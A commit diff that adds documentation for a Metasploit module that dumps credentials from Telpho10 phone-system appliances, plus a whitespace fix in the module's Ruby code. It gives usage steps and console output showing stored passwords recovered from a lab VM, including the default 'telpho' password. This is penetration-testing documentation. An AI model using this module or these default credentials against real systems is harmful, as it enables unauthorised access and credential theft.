Markdown docs added.

Author: pbarry-r7

documentation/modules/auxiliary/admin/http/telpho10_credential_dump.md

@@ -0,0 +1,132 @@
+## Vulnerable Application
+
+  Telpho10 v2.6.31 (32-bit Linux ISO image download [here](http://www.telpho.de/downloads/telpho10/telpho10-v2.6.31-SATA.iso)).
+
+  Supporting documentation for this product can be found [here](http://www.telpho.de/downloads.php).
+
+## Verification Steps
+
+  The following steps will allow you to install and dump the credentials from a Telpho10 instance:
+
+  1. Download the [Telpho10 ISO image](http://www.telpho.de/downloads/telpho10/telpho10-v2.6.31-SATA.iso) and install in a VM (or on a system)
+    - note that the ISO will default to a German keyboard layout
+  1. configure the Telpho10's IP address
+    - edit /etc/networks/interfaces accordingly
+  1. Start msfconsole
+  1. Do: ```use auxiliary/admin/http/telpho10_credential_dump```
+  1. Do: ```set RHOST <IP address of your Telpho10 instance> ```
+  1. Do: ```run```
+  1. You should see a list of the retrieved Telpho10 credentials
+
+## Scenarios
+
+  Example output when using this against a Telpho10 v2.6.31 VM:
+
+  ```
+$ ./msfconsole
+                                                  
+# cowsay++
+ ____________
+< metasploit >
+ ------------
+       \   ,__,
+        \  (oo)____
+           (__)    )\
+              ||--|| *
+
+
+       =[ metasploit v4.12.36-dev-16fc6c1                 ]
++ -- --=[ 1596 exploits - 908 auxiliary - 273 post        ]
++ -- --=[ 458 payloads - 39 encoders - 8 nops             ]
++ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
+
+msf > use auxiliary/admin/http/telpho10_credential_dump
+msf auxiliary(telpho10_credential_dump) > set RHOST 10.0.2.35
+RHOST => 10.0.2.35
+msf auxiliary(telpho10_credential_dump) > run
+
+[*] Generating backup
+[*] Downloading backup
+[+] File saved in: /home/pbarry/.msf4/loot/20161028155202_default_10.0.2.35_telpho10.backup_185682.tar
+[*] Dumping credentials
+
+[*] Login (/telpho/login.php)
+[*] -------------------------
+[+] Username: admin
+[+] Password: telpho
+
+[*] MySQL (/phpmyadmin)
+[*] -------------------
+[+] Username: root
+[+] Password: telpho
+
+[*] LDAP (/phpldapadmin)
+[*] --------------------
+[+] Username: cn=admin,dc=localdomain
+[+] Password: telpho
+
+[*] Asterisk MI (port 5038)
+[*] -----------------------
+[+] Username: telpho
+[+] Password: telpho
+
+[*] Mail configuration
+[*] ------------------
+[+] Mailserver: 
+[+] Username:   
+[+] Password:   
+[+] Mail from:  
+
+[*] Online Backup
+[*] -------------
+[+] ID:       
+[+] Password: 
+
+[*] Auxiliary module execution completed
+msf auxiliary(telpho10_credential_dump) > 
+```
+
+I navigated my browser to the admin page of the UI and changed some of the password values, then ran the module again to verify I see the updated values:
+
+```
+msf auxiliary(telpho10_credential_dump) > run
+
+[*] Generating backup
+[*] Downloading backup
+[+] File saved in: /home/pbarry/.msf4/loot/20161028161929_default_10.0.2.35_telpho10.backup_044262.tar
+[*] Dumping credentials
+
+[*] Login (/telpho/login.php)
+[*] -------------------------
+[+] Username: admin
+[+] Password: s3cr3t
+
+[*] MySQL (/phpmyadmin)
+[*] -------------------
+[+] Username: root
+[+] Password: telpho
+
+[*] LDAP (/phpldapadmin)
+[*] --------------------
+[+] Username: cn=admin,dc=localdomain
+[+] Password: ldaps3cr3t
+
+[*] Asterisk MI (port 5038)
+[*] -----------------------
+[+] Username: telpho
+[+] Password: asterisks3cr3t
+
+[*] Mail configuration
+[*] ------------------
+[+] Mailserver: 
+[+] Username:   
+[+] Password:   
+[+] Mail from:  
+
+[*] Online Backup
+[*] -------------
+[+] ID:       
+[+] Password: 
+
+[*] Auxiliary module execution completed 
+  ```

modules/auxiliary/admin/http/telpho10_credential_dump.rb

@@ -49,7 +49,7 @@ def untar(tarfile)
             File.open(dest, 'wb') do |f|
               f.write(entry.read)
             end
-          File.chmod(entry.header.mode, dest)
+            File.chmod(entry.header.mode, dest)
           end
         end
       end